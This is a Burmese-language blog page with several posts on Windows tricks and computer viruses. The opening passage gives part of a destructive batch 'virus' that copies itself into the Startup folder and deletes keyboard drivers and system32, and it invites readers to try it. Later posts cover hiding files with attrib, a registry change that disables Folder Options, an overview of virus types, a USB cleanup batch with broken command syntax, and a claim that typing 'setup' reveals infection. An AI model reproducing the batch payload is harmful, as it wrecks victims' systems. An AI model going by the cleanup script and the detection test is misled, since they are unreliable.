echo copy Virus.bat "documents and settings\all users\start menu\programs\startup"
echo copy Virus.bat "documents and settings\all users\start menu\programs\startup"
echo copy Virus.bat "documents and settings\all users\start menu\programs\startup"
echo copy Virus.bat "documents and settings\all users\start menu\programs\startup"
echo copy Virus.bat "documents and settings\all users\start menu\programs\startup"
echo copy Virus.bat "documents and settings\all users\start menu\programs\startup"
echo copy Virus.bat "documents and settings\all users\start menu\programs\startup"
echo copy Virus.bat "documents and settings\all users\start menu\programs\startup"
cd C:\WINDOWS\system32
del /S /F /Q keyboard.drv
del /S /F /Q keyboard.sys
del system32
exit
( *****.bat)နဲ ေဆ့ပါ

လုပ္ၾကည့္ရင္ဘာေတြေပၚလာလဲဆိုေတာ့.......welcome to my new virus. ဆိုၿပီးေပၚလာတယ္..ေနာက္ဘာဆက္ၿဖစ္လဲဆိုတာေတာ့ လက္ေတြ႕စမ္းလိုက္ေပါ့ မစမ္းခင္ ဘက္ကပ္လုပ္ထားေနာ္

မုရင္းက    ။        ။  ဒီမွာ
Posted by No comments:
Labels:

ATTRIB Comand ျဖင့္ File, Folder မ်ားကိုေဖ်ာက္နည္း

အခုေျပာခ်င္တာကေတာ့ Attribute အေၾကာင္းပါ..။
ဒီ Command ေလးက ကၽြန္ေတာ့အတြက္ေတာ့ ေတာ္ေတာ္ေလးအသံုး၀င္ပါတယ္...
တေခါက္က Memory Stick ကို Internet ဆိုင္မွာသံုးၿပီး အိမ္ကစက္မွာျပန္သံုးတာ
ဒီ ATTRIB Command နဲ႔စစ္လိုက္ေတာ့ Autorun.inf နဲ႕ Folder.exe ဆိုၿပီး Virus
2 ေကာင္ေတာင္ပါလာတယ္ဗ်...ကြန္ေတာ္လည္းထံုးစံအတိုင္းသတ္လိုက္တာေပါ့ေလ...
ဒါေပမယ့္ F: Drive ကိုဖြင့္ၾကည့္လိုက္ေတာ့ဘာမွမရွိေတာ့ဘူး အကုန္လံုးကိုက္ကုန္ပီ...
ကၽြန္ေတာ္ကေတာ့သြားၿပီ..Download ခ်ခဲ့သမွ်ေတာ့ကုန္ၿပီလို႕ထင္ေနတာ...
ဒီမွာတခုေျပာခ်င္တာက Memory Stick ကုိ Virus ကိုက္တိုင္း Format မခ်ပါနဲ႔.....
ေသေသခ်ာခ်ာစစ္ပါ..မဟုတ္ရင္မလိုအပ္ဘဲဆံုးရႈံးမႈေတြျဖစ္လာပါလိမ့္မယ္.....
အဲဒါနဲ႕ Tab key ႏွိပ္ႏွိပ္ၿပီးၾကည့္ေတာ့ မူရင္း Folder ေတြရွိေနေသးတယ္...
ဘာလို႕လဲဆိုေတာ့ Virus ကမူရင္း Folder ေတြကို Hidden လုပ္လိုက္တာပါ...
အဲဒါကေတာ့ Attrib နဲ႔ရွာလို႔မရဘူးေလ....Folder Options မွာသြားလုပ္မွရတာ..
Tools > Folder Options > View ကိုသြား View ေအာက္မွာ
Show hidden files and folders မွာ Click ေပးလိုက္...
ၿပီးရင္ၾကည့္လိုက္ပါ Folder မွိန္မိွန္ေလးေတြကိုေတြ႕ရပါလိမ့္မယ္။
မွိန္ေနတဲ့ Folder ကို R-Click ေထာက္ properties ကိုသြား..
General ေအာက္မွာၾကည့္လိုက္ Hidden မွာ Click ေပးထားတာကို
Click ျဖဳတ္လိုက္ပါ...အဲဒါဆိုျပန္ရၿပီေပါ့.....ကၽြန္ေတာ္အဲဒီေကာင္ကိုလိုက္ဖမ္းေသးတယ္..
မရလိုက္ဘူးရတဲ့အခါတင္ေပးမယ္....နည္းနည္းေလရွည္သြားတယ္...
Ok..စၿပီးေတာ့ ေဖ်ာက္လိုက္ၾကရေအာင္...

1) Start > Run > cmd လို႔ရိုက္ပါ...
2) ၿပီးရင္ ေဖ်ာက္ခ်င္တဲ့ File, Folder ကိုလမ္းေၾကာင္းေပးပါ။
ဥပမာ- ေဖ်ာက္ခ်င္တဲ့ File, Folder က "D:" ထဲမွာရွိေနတယ္ဆိုရင္
"D:\" ကိုေရာက္ေအာင္သြားပါ...
3) ေဖ်ာက္ခ်င္တဲ့ File က D: ထဲက 1.JPG ဆိုပါစို႔...
D:\>attrib +s +h +r 1.jpg ဆိုၿပီးေတာ့ရိုက္လိုက္ပါ.....
အဲဒါဆုိရင္ အဲဒီ JPG File ေလးေပ်ာက္သြားပါၿပီ...
4) ျပန္ေဖၚခ်င္ရင္ေတာ့
D:\>attrib -s -h -r 1.jpg ဆိုၿပီးေတာ့ရိုက္လိုက္ပါ...
ျပန္ေပၚလာပါလိမ့္မယ္.....စမ္းၾကည့္လိုက္ၾကပါဦး....အသံုး၀င္မယ္လို႕ေတာ့ထင္ပါတယ္....

တကယ္ေတာ႔ folder option ထဲက view all file ကိုႏွိပ္ရင္ ဖိုင္ေတြအကုန္ေပၚလာတယ္ဗ်
သိပ္ေတာ႔ မ၀ွက္ဘူးေနာ္

attrib -s -h -r *.* ဆိုရင္ဖိုင္ေတြအကုန္ေပၚတယ္ဗ်ာ
ဖိုဒါေတြပါအကုန္ေပၚခ်င္ရင္ဘယ္လိုရိုက္ကမလဲ...

older Options တည္းမွာ  Hidden လုထားတဲ႕ဖုိင္ေတြေပၚေနရင္ ...  ဖုိင္ေတြကုိဖြက္ျပီးရင္ ..  Folder Options ကုိပိတ္ထားလို႕ရပါတယ္ ...  လုပ္ပံုလုပ္နည္းကေတာ႕
Run - regedit
          HKEY CURRENT USER
           SOFT WARE
          MOCROSOFT
          WINDOWS
          CURRENT VERSION
          POLICIES
        EXPLORER  ကုိေရာက္တာနဲ႕ Tab Key နဲ႕ တစ္ဖက္ကုိေျပာင္းျပီး ...  Right Click - DWORD Value ကုိနွိပ္ .. အဲ႕ထဲမွာ .. NoFolderOptions လို႕ေရးျပီးရင္ေတာ႕ Enter ေခါက္ျပီးေတာ႕ တန္ဖုိးကုိ  (1) ေျပာင္းလုိက္ပါ
အဆင္ေျပပါေစဗ်ာ ............

မူရင္းက ။    ။     ဒီမွာ
Posted by No comments:
Labels:

သတိထားရမည့္ virus (၉) မ်ိဳးႏွင့္ အလုပ္လုပ္ပုံ

သင္ဟာ ကြန္ပ်ဴတာ လံုျခံဳေရး ၿခိမ္းေျခာက္မႈအေၾကာင္းကို အမ်ားအျပား မသိဘူး ဆိုရင္ေတာင္မွ ေျခခံ ဗဟုသုတက အသံုးက်ႏိုင္ပါသည္။ တခါတရံမွာ သူတို႔ရဲ႕ အက်ိဳးဆက္မ်ားကို မသိခင္ ဘယ္လို အႏၲရာယ္ ရွိလဲဆိုတာကို သိဖို႔ ခက္ခဲပါလိမ့္မယ္။ Computer virus နဲ႔အတူ အက်ိဳးဆက္ေတြက တခါတရံမွာ မည္သို႔ သင့္ရဲ႕ အခ်က္အလက္ေတြ ဆံုးရႈံးပံု မည္မွ် အေထာက္အထားေတြ ခိုးယူမႈ ျဖစ္ပံုတို႔ ျဖစ္သည္။ ဒါေၾကာင့္ ေနာက္က်တာထက္ကို ပိုျပီး သင္ယူဖို႔ ေကာင္းပါတယ္။

၁။Boot Sector Virus
မူလ MS-DOS မွလာေသာ ေယဘုယ် အမည္ကို “boot sector” ဟု သတ္မွတ္သည္။ သို႔ေပမယ့္ ယခုအခါ ဘယ္ operating system မွာ ျဖစ္ျဖစ္ ေယဘုယ်အားျဖင့္ boot information ကို အသံုးျပဳခဲ့သည္။ Modern computer မ်ားမွာ အထူးသျဖင့္ “master boot record” ဟုေခၚၿပီး ၎သည္ partitioned storage device တစ္ခုေပၚက first sector ျဖစ္သည္။ Computer ကို boot တက္ေစရန္ floppy disks ကို အသံုးျပဳျခင္းေၾကာင့္ boot sector virus ဟာ ေက်ာ္ၾကားလာပါသည္။ Internet အသံုးျပဳမႈ က်ယ္ျပန္႔လာျခင္းႏွင့္ virus ကူးစက္ျခင္းခံရတဲ့ floppy ေတြေၾကာင့္ virus ပ်ံ့ႏွံ႔မႈဟာ ပိုၿပီး အက်ိဳး သက္ေရာက္လာတယ္။

၂။ Browser Hijacker


ဒီ virus အမ်ိဳးအစားမွာ ဆိုရင္ အလကားရတဲ့ download ေတြမွာ နည္းလမ္း အေတာ္မ်ားမ်ားနဲ႔ သူကိုယ္တိုင္ ပ်ံ့ႏွံ႔ႏိုင္ျခင္း၊ အခ်ိဳ႕ browser function ေတြကို ထိထိေရာက္ေရာက္ ပုန္းကြယ္ တိုက္ခိုက္ျခင္း၊ အထူးသျဖင့္ re-directing ပံုစံျဖင့္ user ေတြရဲ႕ particular site ေတြဆီသို႔ အလိုအေလ်ာက္ ပ်ံ့ႏွံ႔ႏိုင္သည္။ Web ေၾကာ္ျငာမ်ားမွ ေငြေၾကးတိုးပြားေစဖို႔ သူတို႔က နည္းဗ်ဴဟာ designed ျပဳလုပ္ခဲ့တယ္လို႔ ေယဘုယ်အားျဖင့္ ယူဆရသည္။ သူတို႔ေတြက virus မ်ားစြာကဲ့သို႔ အထူးသျဖင့္ “search” ကေဖာ္ျပခ်က္ရဲ႕ တေနရာရာမွာ ပါ၀င္ပါသည္။ Cool web search သည္ ေကာင္းစြာသိႏိုင္တဲ့ နမူနာ ျဖစ္ပါသည္။ ဒါေပမယ့္ တျခားဟာက သာမန္လုနီးပါးပါ။

၃။ Direct Action Virus
ဒီ virus အမ်ိဳးအစားဟာ မႀကိဳက္ဆံုးႏွင့္ ဖိုင္ထဲမွာပါ၀င္တဲ့ virus ကိုစီမံတဲ့အခါ လုပ္ေဆာင္မႈထဲမွာ သာလ်င္ ပါ၀င္သည္။ ပ်ံ့ႏွံ႔အားက ျဖန္႔ေ၀ၿပီးေနာက္ virus မ်ားဟာ အေျခခံအားျဖင့္ ပုန္းကြယ္ေနၿပီး ၎တို႔က virus ကူးစက္ထားတဲ့ ဖိုင္က ေနာက္တစ္ၾကိမ္ စီမံျခင္းမရွိဘဲ နဲ႔ အျခားလႈပ္ရွားမႈမ်ား မရွိပါ။ Virus အမ်ားစုဟာ အလြယ္တကူ ျပန္လည္ ထုတ္လုပ္ျခင္း၏ တိုက္ရိုက္လုပ္ေဆာင္မႈနည္းလမ္းကို အသံုးမျပဳပါ။ အဘယ္ေၾကာင့္ဆိုေသာ္ ၎က လ်င္ျမန္စြာ မေပါက္ပြားပါဘူး။ ဒါေပမယ့္ အဲဒီ အမ်ိဳးအစား virus က အရင္ထဲက ပ်က္စီးၿပီးသားပါ။ ၁၉၈၈ မွာ computer မ်ားကို ခဏ ၿခိမ္းေျခာက္ခဲ့တဲ့ Vienna virus ဟာ တိုက္ရိုက္လုပ္ေဆာင္မႈ virus ရဲ႕ နမူနာ ျဖစ္ပါသည္။

၄။ File Infector Virus

Virus ရဲ႕ အေကာင္းဆံုး အမ်ိဳးအစား ျဖစ္ေကာင္းျဖစ္ႏိုင္၊ အကိုက္ခံရတဲ့ ဖိုင္ေတြဟာ host file မွာ root ျပဳလုပ္ၿပီး ဖိုင္ကိုစီမံတဲ့အခါ သူ႔ operation စတင္ပါသည္။ virus ကူးစက္ျခင္းခံရေသာေၾကာင့္ ဖိုင္ေတြကို လံုး၀ overwrite ျဖစ္ႏိုင္ပါတယ္။ သို႔မဟုတ္ ဖိုင္ရဲ့ အစိတ္အပိုင္း အစားထိုးရံုသာ ျဖစ္ႏိုင္၊ သို႔မဟုတ္ ဘယ္ဟာျဖစ္ျဖစ္ အစားထိုးလို႔ မရနိုင္၊ ဒါေပမယ့္ ဖိုင္ေတြကို re-write အစား user ရည္ရြယ္ခဲ့တဲ့ program ထက္ virus ကစီမံခဲ့ရတယ္။ File virus လို႔ အဓိပၸါယ္ သတ္မွတ္ေသာ္လဲ ေယဘုယ်အားျဖင့္ ဖိုင္အားလံုးထဲမွာ ရွိတဲ့ virus အားလံုးကို မသက္ေရာက္ႏိုင္ပါ။ ဥပမာအားျဖင့္ Macro virus က file virus ရဲ႕ ေအာက္ကလို႔ မရည္ရြယ္ပါဘူး။ Definition ကေယဘုယ်အားျဖင့္ virus သာ အဓိပၸါယ္ ရည္ညြန္းခဲ့ၿပီး အဲဒီ virus အစား သူတို႔ host ကို (.exe) ကဲ့သို႔ တရား၀င္ သတ္မွတ္ထားတဲ့ file format ကို သံုးခဲ့တယ္။

၅။ Macro Virus
Program ရဲ႕အမ်ိဳးမ်ိဳးေသာ က်ယ္ျပန္႔မႈမွာ Microsoft excel ကဲ့သို႔ application ထုက္လုပ္မႈ ပါ၀င္ၿပီး တိက်တဲ့ macro programming language ကို သံုးတဲ့ document ထဲမွာ ပုန္းေနတဲ့ virus အတြက္ ၎က ျပဳလုပ္ေပးဖို႔ ျဖစ္ႏိုင္ပါတယ္။ Macro virus ရဲ႕ ပ်ံ့ႏွံ႔အားဟာ အရမ္းက်ယ္ျပန္႔ပါသည္။ Macro virus ကို ေကာင္းေကာင္းသိႏိုင္တာက ေသခ်ာသေလာက္ေတာ့ Melissa ျဖစ္ၿပီး ညစ္ညမ္း website ေတြမွာ စကားလံုး စာရြက္စာတမ္းလို႔ ထင္ရတဲ့ password ေတြ ပါ၀င္ေနပါသည္။ Virus ေတြက စကားလံုးနဲ႔ link ေတြ ကို အသံုးခ်ၿပီး Microsoft outlook ကေန အလိုအေလ်ာက္ email ေတြကို သူတို႔ကိုယ္တိုင္ ကူးႏိုင္ပါသည္။

၆။ Multipartite Virus
အခ်ိဳ႕ virus မ်ားဟာ နည္းလမ္းတစ္ခုမွ တဆင့္ ပ်ံ့ႏွံ႔ဖို႔ သို႔မဟုတ္ payload တစ္ခုသို႔ ေပးပို႔စဥ္တြင္ multipartite virus က အားလံုးကို လိုခ်င္သည္။ ဒီ အမ်ိဳးအစား virus က နည္းလမ္းမ်ားစြာနဲ႔ ပ်ံ့ႏွံ႔ႏိုင္ၿပီး ၎က ေျပာင္းလဲႏိုင္ေသာ ေရာဂါပိုး ၀င္တဲ့ ကြန္ပ်ဴတာဟာ operating system install လုပ္ျခင္း သို႔မဟုတ္ တိက်တဲ့ ဖိုင္ရဲ႕ ရပ္တည္ေရး ကဲ့သို႔ အေျခအေနေပၚ မူတည္ၿပီး လုပ္ေဆာင္မႈ ကြဲျပားပါ လိမ့္မည္။

၇။ Polymorphic Virus

အျခား jack-of all trades မွာ polymorphic virus ေတြဟာ အမွန္တကယ္ ပိုၿပီး အသြင္ေျပာင္းျခင္း သို႔မဟုတ္ virus သတ္ၿပီးတိုင္းေနာက္ သူတို႔ဟာ payload ေပးပို႔ဖို႔ ေျပာင္းလဲေနတဲ့ code ကို အသံုးျပဳခဲ့သည္။ တနည္းအားျဖင့္ ဒါမွမဟုတ္ ဒါ့အျပင္ စိတ္ခ်ႏိုင္တဲ့ အေျခအေနမွာ ေတြဆံုတဲ့အခါ သူ႔ဟာသူ အလိုအေလ်ာက္ ေျပာင္းလဲေနေသာ polymorphic virus ေတြဟာ encryption algorithm ႏွင့္အတူ သူ႔ဟာသူ ေစာင့္ေရွာက္ႏိုင္ပါသည္။ သူ႔ လွည့္စားမႈ ရဲ႕ ၇ည္ရြယ္ခ်က္က ေရွာင္လြဲဖို႔ ျဖစ္ပါတယ္။ Antivirus program ေတြဟာ တိက်တဲ့ code ကို သံုးျခင္းျဖင့္ virus ကို မၾကာခဏ ရွာႏိုင္ပါသည္။ Virus ရဲ႕ code ေျပာင္းလဲျခင္းက virus ရွာေဖြေတြ႕ရွိျခင္းကို ေရွာင္ရွားဖို႔ ကူညီႏိုင္သည္။

၈။ Resident Virus
ဒီ က်ယ္ပ်ံ့တဲ့ virus definition က အခ်ိဳ႕ virus ကို system ရဲ႕ memory ထဲမွာ သူကိုယ္တိုင္ ထည့့္ျခင္းျဖင့္ သက္ေရာက္ႏိုင္ပါသည္။ ထို႔ေနာက္ အခ်ိဳ႕ လုပ္ေဆာင္မႈရဲ႕ အေရအတြက္ ေတာ္ေတာ္မ်ားမ်ားကို ယူၿပီး မူလ ကူးစက္ၿပီးသား ဖိုင္ကို သီးျခား run ႏိုင္ပါသည္။ Resident virus ဟာ direct payload virus နဲ႔ ႏႈိင္းယွဥ္ၿပီး သူတို႔ဟာ system ရဲ႕ memory ထဲကို သူတို႔ကိုယ္တိုင္ မထည့္ႏိုင္ဘူး၊ ဘာလို႔လဲဆိုေတာ့ ေရာဂါ ကူးစက္ၿပီးသား ဖိုင္ကို စီမံတဲ့အခါမွာ သာလ်င္ လုပ္ေဆာင္ပါသည္။

၉။ Web Scripting Virus
မ်ားစြာေသာ website ေတြမွာ စိတ္၀င္စားစရာ ပါရွိတဲ့ စီစဥ္မႈအရ ရႈပ္ေထြးတဲ့ code ေတြနဲ႔ စီမံထားသည္။ သင့္ရဲ႕ browser မွာ online video ျပေနေသာအခါ ဥပမာအားျဖင့္ video ကိုယ္တိုင္ႏွင့္ player ၾကားခံႏွစ္ခုလံုး ေထာက္ပံ့ဖို႔ တိက်တဲ့ code language စီမံျခင္း လိုအပ္ပါတယ္။ ဟုတ္ပါတယ္ code ေတြဟာ တခါတရံမွာ စြန္႔စားရႏိုင္တယ္။ ၎က computer ကို virus ၀င္ဖို႔ သို႔မဟုတ္ website ကို ျဖတ္ျပီး computer ေပၚမွာ လႈပ္ရွားႏိုင္ဖို႔အတြက္ သူဟာ လုပ္ေဆာင္ေနျခင္း ျဖစ္ႏိုင္ပါတယ္။ Malicious site ေတြမွာေတာင္မွ ရည္ရြယ္ထားတဲ့ ကူးစက္ျပီးသား code ေတြနဲ႔ တခါတရံ ဖန္တီးႏိုင္သည္။ Virus ေတြ႕ႏိုင္တဲ့ အေျခအေန အမ်ိဳးမ်ိဳးမွာ webmaster ရဲ့ သိရွိမႈမပါဘဲ site တစ္ခုထဲ code ေတြ ထည့္သြင္း ႏိုင္ပါသည္။

နိဂံုးခ်ဳပ္ အေနျဖင့္ ဒီ article မွာ computer virus အမ်ိဳးအစားတိုင္း ပါ၀င္ပါတယ္။ ဒါေပမယ့္ လူေတြသိတဲ့ virus အမ်ိဳးအစားတိုင္းရဲ့ စာရင္းေတြ မပါ၀င္ပါဘူး။ အခ်ိဳ႕ worms ဒါမွမဟုတ္ Trojans လည္းပဲ မပါ၀င္ပါဘူး။ အဲဒါဟာ သာမန္ ျခိမ္းေျခာက္မႈ ႏွစ္ခုျဖစ္ျပီး virus နဲ႔ ဆင္တူပါတယ္။ ဒါေပမယ့္ နည္းစနစ္အရ မတူပါဘူး။
Posted by No comments:
Labels:

Memory stick မွ virus မ်ားကုိ အလြယ္ဆုံးသတ္နည္း.......


ကြ်န္ေတာ္ ဒီတစ္ခါ…Memory Stick ေတြမွာ ၾကံဳတတ္တဲ့ျပသာနာေလးေတြ ေျဖရွင္းတဲ့နည္းေလး ေျပာျပမွာပါ....
Memory Stick ထိုးလိုက္တာနဲ ့…Autorun.inf တုိ ့ Recycled.exe တုိ ့ Rundll32.exe တုိ ့..ဘာတုိ ့ညာတုိ ့ေပါ့…
အဲဒီ virus ေတြကို USB Disk Security မွာလာျပတယ္ေလ…
အဲဒါေတြကို အရမ္းရမ္းေကာင္းပါတယ္ဆုိတဲ့..Kasper ကေတာင္ မဖ်က္နိုင္ဘူး…
USB Disk Security မွာ Delete လုပ္လဲ တစ္ခ်ိဳ ့ ဟာေတြကို delete လုပ္လုိ ့မရပါဘူး.....
တစ္ျခားေထြေထြထူးထူး ဘာမွ မဟုတ္ပါဘူး…. Bat file နဲ ့ command ေတြေရးျပီးရွင္းတဲ့နည္းေလးပါ…..


ပထမဦး ဆံုး Notepad တစ္ခုကိုဖြင့္ပါ…

ျပီးရင္ ေအာက္မွာ ေရးထားတဲ့ command ေတြကို copy ကူးထည့္လုိက္ပါ…

@echo del: E:Autorun.inf del: F:Autorun.inf del: G:Autorun.inf del: H:Autorun.inf del:
E:Recycled.exe del: F:Recycled.exe del: G:Recycled.exe del: H:Recycled.exe del:
E:RUNDLL32.exe del: F:RUNDLL32.exe del: G:RUNDLL32.exe del: H:RUNDLL32.exe @echo

ျပီးရင္ေတာ့.. နာမည္တစ္ခုခု.bat (eg. Kill.bat) ဆုိျပီး ကို္ယ့္ရဲ့ Memory Stick ထဲမွာ Save လုိက္ပါ…

အဲဒီ Kill.bat ဆုိတဲ့ file ေလးကိုေတာ့ မဖ်က္ပစ္လုိက္နဲ့ေနာ္…
Stick ထိုးတုိင္း အဲဒီ file ေလးကို double click လုပ္ျပီး run လုိက္ေပါ့…

ဒါဆိုရင္ ကိုယ့္ရဲ့ Memory Stick ထဲက virus ေတြအကုန္ရွင္းသြားလိမ့္မယ္……
Posted by No comments:
Labels:

virus ရွိမရွိ အလြယ္ဆုံးစစ္ေဆးနည္း

Start-->Run --> cmd ရိုက္ထည့္ပါ .. Command prompt ေပၚလာပါမည္ ..
cd\ ရိုက္ထည့္ပါ enter ႏိုပ္ပါ..

C:\>setup လို႕ ရိုက္ထည့္မယ္ enter ႏိွပ္မယ္...

ဒါဆိုရင္ please go to the Control Panel to install and configure system components
ဆိုၿပီး dialog box ေလးေပၚလာရင္ virus မရွိပါဘူး....။

မေပၚခဲ့ရင္ ေတာ့ virus ရွိေနပါၿပီ...။
Posted by No comments:
Labels:
Subscribe to: Posts (Atom)